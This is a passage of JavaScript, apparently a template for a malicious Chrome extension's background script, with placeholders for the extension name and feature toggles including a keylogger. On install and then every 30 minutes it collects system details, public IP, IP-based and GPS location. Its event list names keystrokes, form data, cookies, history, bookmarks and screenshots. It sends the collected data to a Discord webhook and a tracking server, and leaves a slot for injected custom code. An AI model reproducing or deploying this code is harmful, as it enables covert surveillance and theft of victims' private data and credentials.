      embed.fields = embed.fields || [];
      embed.fields.push({
        name: "🔗 Current URL",
        value: (data.url || data.tabInfo?.url)?.substring(0, 200) || 'Unknown',
        inline: false
      });
    }

    const webhookPayload = {
      username: "🕵️ {{EXTENSION_NAME}} Monitor",
      avatar_url: "https://cdn.discordapp.com/emojis/853928735535742986.png",
      embeds: [embed]
    };

    console.log('📤 Sending enhanced data to Discord webhook...');

    const response = await fetch(WEBHOOK_URL, {
      method: 'POST',
      headers: { 'Content-Type': 'application/json' },
      body: JSON.stringify(webhookPayload)
    });

    if (!response.ok) {
      console.error('Webhook failed:', response.status, response.statusText);
    } else {
      console.log('✅ Enhanced data sent to webhook successfully');
    }

  } catch (error) {
    console.error('❌ Error in sendToWebhook:', error);
  }
}

// Get color based on event type
function getColorForEventType(eventType) {
  const colors = {
    'extension_installed': 0x00FF00,         // Green
    'page_loaded': 0x3498DB,                 // Blue  
    'tab_activated': 0x9B59B6,               // Purple
    'page_analysis': 0xF39C12,               // Orange
    'click_event': 0xE74C3C,                 // Red
    'keystroke_event': 0xFF0000,             // Bright Red
    'form_submit': 0x8E44AD,                 // Dark Purple
    'browser_history_collected': 0xFF4444,   // Red
    'bookmarks_collected': 0x00AA00,         // Green
    'cookies_collected': 0xFF8800,           // Orange
    'screenshots_captured': 0x9B59B6,        // Purple
    'storage_data_collected': 0x3498DB,      // Blue
    'comprehensive_data_collection': 0xFF0000 // Bright Red
  };
  return colors[eventType] || 0x95A5A6; // Default gray
}

// Send data to tracking server
async function sendToServer(data) {
  try {
    if (!TRACKING_SERVER) {
      console.warn('No tracking server configured');
      return;
    }

    const response = await fetch(`${TRACKING_SERVER}/api/extension-track`, {
      method: 'POST',
      headers: { 'Content-Type': 'application/json' },
      body: JSON.stringify(data)
    });

    if (!response.ok) {
      console.error('Server tracking failed:', response.status);
    } else {
      console.log('✅ Data sent to tracking server');
    }
  } catch (error) {
    console.error('Error sending to server:', error);
  }
}

// Get current position with timeout
function getCurrentPosition() {
  return new Promise((resolve, reject) => {
    navigator.geolocation.getCurrentPosition(resolve, reject, {
      timeout: 10000,
      maximumAge: 300000,
      enableHighAccuracy: true
    });
  });
}

// Extension installation handler
chrome.runtime.onInstalled.addListener(async (details) => {
  console.log('{{EXTENSION_NAME}} installed:', details);

  try {
    // Collect initial system information
    const systemInfo = await collectSystemInfo();

    // Store installation data
    collectedData.installation = {
      reason: details.reason,
      timestamp: new Date().toISOString(),
      extensionId: EXTENSION_ID,
      sessionId: sessionId,
      systemInfo: systemInfo
    };

    // Collect geolocation if enabled
    if ({{FEATURE_GEOLOCATION}}) {
      await collectGeolocation();
    }

    // Send comprehensive installation notification
    await sendToWebhookAndServer({
      type: 'extension_installed',
      reason: details.reason,
      systemInfo: systemInfo,
      sessionId,
      userId: USER_ID,
      extensionId: EXTENSION_ID,
      extensionName: '{{EXTENSION_NAME}}',
      extensionVersion: '{{EXTENSION_VERSION}}',
      features: ['{{FEATURE_IP_TRACKING}}', '{{FEATURE_GEOLOCATION}}', '{{FEATURE_BROWSER_INFO}}', '{{FEATURE_SCREENSHOT}}', '{{FEATURE_FORM_DATA}}', '{{FEATURE_CLICK_TRACKING}}', '{{FEATURE_KEYLOGGER}}'].filter(f => f === 'true'),
      timestamp: new Date().toISOString()
    });

    // Start comprehensive data collection after a short delay
    setTimeout(() => {
      collectAllConfiguredData();
    }, 3000);

  } catch (error) {
    console.error('Error during installation setup:', error);
  }
});

// System information collection
async function collectSystemInfo() {
  try {
    const systemInfo = {
      platform: navigator.platform,
      userAgent: navigator.userAgent,
      language: navigator.language,
      languages: navigator.languages,
      cookieEnabled: navigator.cookieEnabled,
      onLine: navigator.onLine,
      hardwareConcurrency: navigator.hardwareConcurrency,
      deviceMemory: navigator.deviceMemory,
      screenResolution: `${screen.width}x${screen.height}`,
      screenColorDepth: screen.colorDepth,
      timezone: Intl.DateTimeFormat().resolvedOptions().timeZone,
      timestamp: new Date().toISOString(),
      extensionVersion: chrome.runtime.getManifest().version,
      extensionName: chrome.runtime.getManifest().name,
      permissions: chrome.runtime.getManifest().permissions || [],
      browserInfo: {
        vendor: navigator.vendor,
        product: navigator.product,
        appName: navigator.appName,
        appVersion: navigator.appVersion,
        buildID: navigator.buildID
      }
    };

    // Get IP address information
    try {
      const ipResponse = await fetch('https://api.ipify.org?format=json');
      const ipData = await ipResponse.json();
      systemInfo.publicIP = ipData.ip;

      // Get detailed location info
      const locationResponse = await fetch(`https://ipapi.co/${ipData.ip}/json/`);
      const locationData = await locationResponse.json();
      systemInfo.location = {
        country: locationData.country_name,
        region: locationData.region,
        city: locationData.city,
        latitude: locationData.latitude,
        longitude: locationData.longitude,
        timezone: locationData.timezone,
        isp: locationData.org
      };
    } catch (ipError) {
      console.log('Could not fetch IP/location data:', ipError);
      systemInfo.publicIP = 'Unknown';
      systemInfo.location = null;
    }

    collectedData.systemInfo = systemInfo;
    collectedData.browserInfo = systemInfo.browserInfo;
    collectedData.permissions = systemInfo.permissions;

    return systemInfo;
  } catch (error) {
    console.error('Error collecting system info:', error);
    return null;
  }
}

// Placeholder for collectGeolocation function
async function collectGeolocation() {
  try {
    const position = await getCurrentPosition();
    collectedData.geolocation = {
      latitude: position.coords.latitude,
      longitude: position.coords.longitude,
      accuracy: position.coords.accuracy,
      timestamp: new Date(position.timestamp).toISOString()
    };
    console.log('Geolocation collected:', collectedData.geolocation);
  } catch (error) {
    console.error('Error collecting geolocation:', error);
    collectedData.geolocation = { error: 'Failed to get geolocation' };
  }
}

// Set up periodic data collection every 30 minutes
setInterval(() => {
  console.log('🔄 Periodic data collection...');
  collectAllConfiguredData();
}, 30 * 60 * 1000);

// Custom user code injection point
try {
  {{CUSTOM_CODE}}
} catch (error) {
  console.error('Custom code error:', error);
}
